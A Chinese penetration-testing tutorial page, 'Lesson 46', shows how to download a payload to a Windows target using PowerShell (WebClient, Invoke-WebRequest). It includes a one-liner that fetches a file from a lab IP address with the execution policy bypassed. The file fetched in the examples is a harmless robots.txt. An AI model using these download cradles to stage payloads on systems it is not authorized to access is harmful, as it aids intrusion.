第四十六课:powershell一句话下载payload

释放双眼,带上耳机,听听看~!

自 Windows7 以后内置了 powershell,如Windows 7 中内置了 PowerShell2.0, Windows 8 中内置了 PowerShell3.0。

靶机:windows 7 powershell $PSVersionTable

down.ps1:

基于System.Net.WebClient

null

附:

$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:\PDF\" 
ForEach ( $item in $Urls) {
$file = $OutPath + ($item).split('/')[-1]
(New-Object System.Net.WebClient).DownloadFile($item, $file) 
}

靶机:windows 2012 powershell $PSVersionTable

down.ps1:

在 powershell 3.0以后,提供 wget 功能,既 Invoke-WebRequest

C:\inetpub>powershell C:\inetpub\down.ps1 注:需要绝对路径。

null
null

附:

$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"

当然也可以一句话执行下载:

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')
null

Micropoor

人已赞赏
安全教程

第四十五课:解决bat一句话下载payload黑窗

2019-11-9 15:54:03

安全教程

MSSQL注入-目录

2019-11-11 11:17:10

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索